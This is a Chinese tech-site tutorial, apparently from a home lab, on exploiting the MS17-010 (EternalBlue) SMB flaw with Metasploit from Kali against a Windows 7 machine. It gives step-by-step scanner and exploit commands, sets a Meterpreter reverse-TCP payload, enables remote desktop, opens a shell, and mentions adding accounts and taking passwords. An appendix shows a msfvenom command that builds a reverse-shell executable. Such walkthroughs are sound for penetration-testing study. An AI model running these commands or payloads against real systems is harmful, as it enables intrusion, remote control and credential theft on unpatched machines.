IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> 利用Metasploit控制目标电脑(Win7_x64系统) -> 正文阅读

[网络协议]利用Metasploit控制目标电脑(Win7_x64系统)

介绍

? ? ? MSF,是The Metasploit Framework的简称。MSF是一个非常好用的渗透框架,里面集成了许多框架和工具;MSF高度模块化,即框架由多个module组成。进一步解释,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新;metasploit涵盖了渗透测试中全过程,可以在这个框架下利用现有的Payload进行一系列的渗透测试。

MS17-010(永恒之蓝)漏洞简介

? ? ? 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。(从EternalBlue这个Exploit被影子经纪人公布到互联网上后,就成为了“明星”。在漏洞被发现的五月中,这个Exploit被多款恶意软件利用。包括肆虐的WannaCryp0t,无文件的勒索软件UIWIX和SMB蠕虫EternalRocks。EternalBlue(在微软的MS17-010中被修复)是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码)。

? ??永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。

目录

1. 前提

2. 开启模块

3. 查找漏洞

4. 设置模块

5. 设置参数并开始攻击

6. 攻击成功及反馈

7. 获取靶机权限

8. 附加

1. 前提

???①kali攻击机与Win7系统在同一局域网的同一网段上;

? ?②能相互ping通。

? ? Kali信息:

? ? 网卡使用VMnet8,通过物理机可知:

? ? Win7信息:

? 测试下网络是否能ping通:

?2.?开启模块

? ? ?打开kali,利用msf框架进行渗透,先查看kali数据库是否开启:

service postgresql status

? ? 下图为没有开启,还可以设置postgresql,开机自启:

update-rc.d postgresql enable

?3. 查找漏洞

? ? 首先使用namp对靶机(Win7系统)进行扫描,确定445端口是否开启;?

4. 设置模块?

? ?打开metasploit搜索ms17-010;

? ①进入msfconsole (每次界面随机,不固定)

? ②初始化数据库??msfdb init

??下面直接查找漏洞ms17_010(永恒之蓝就是利用这个漏洞)。

? 关注两个:扫描漏洞? ??auxiliary/scanner/smb/smb_ms17_010;

? ? ? ? ? ? ? ? ? ? 漏洞利用? ?exploit/windows/smb/ms17_010_eternalblue;

?5.?设置参数并开始攻击

? ??选择漏洞验证扫描工具并设置参数;

? ? ①use auxiliary/scanner/smb/smb-ms17-010 利用扫描漏洞,开启模块

? ? ②show options:查看设置

? ?③set rhost 靶机ip(192.168.137.140)

? ?④exploit 运行

? ?选择攻击模块并设置参数;

? ①use exploit/windows/smb/ms17_010_eternalblue //选择模块

? ②options //查看详细信息

? ?③set payload windows/x64/meterpreter/reverse_tcp //选择荷载

? ?④set rhost 靶机ip(Win7:192.168.137.140)

? ?⑤set lhost 攻击机ip(kali:192.168.137.134)

?6.?攻击成功及反馈

? ??exploit //运行攻击

7.?获取靶机权限

? ?①run getgui -e // 开启靶机3389端口(远程桌面用)

? ?②查看系统信息、提权添加账户以及获取密码等

? ?输入shell进入目标系统 shell

? ?chcp 65001 //解决shell后windows终端乱码

? ?sysconfig? //查看靶机系统信息

附加:

? ? 当然还有一种方法对Windows系统进行渗透,即Windows操作系统下Meterpreter的使用。

? ? ① 生成一个被控端payload1.exe,再启动Metasploit

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.137.139 lport=5000 -f exe -o /root/payload1.exe 

??②成功启动Metasploit之后,执行以下命令,将生成的payload1复制到虚拟机Windows 7中,此时在主控端就可以打开一个Meterpreter控制会话(session)

? ③background命令可将当前会话切换到后台,就可以返回到上一级的模块控制处了;

? sessions命令可显示所有的会话,以查看目标机的信息。

?下面送上两张常用命令的图片

至此,两种方式对靶机已成功渗透。

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-08-06 11:14:36  更:2022-08-06 11:15:22 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/25 23:39:56-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码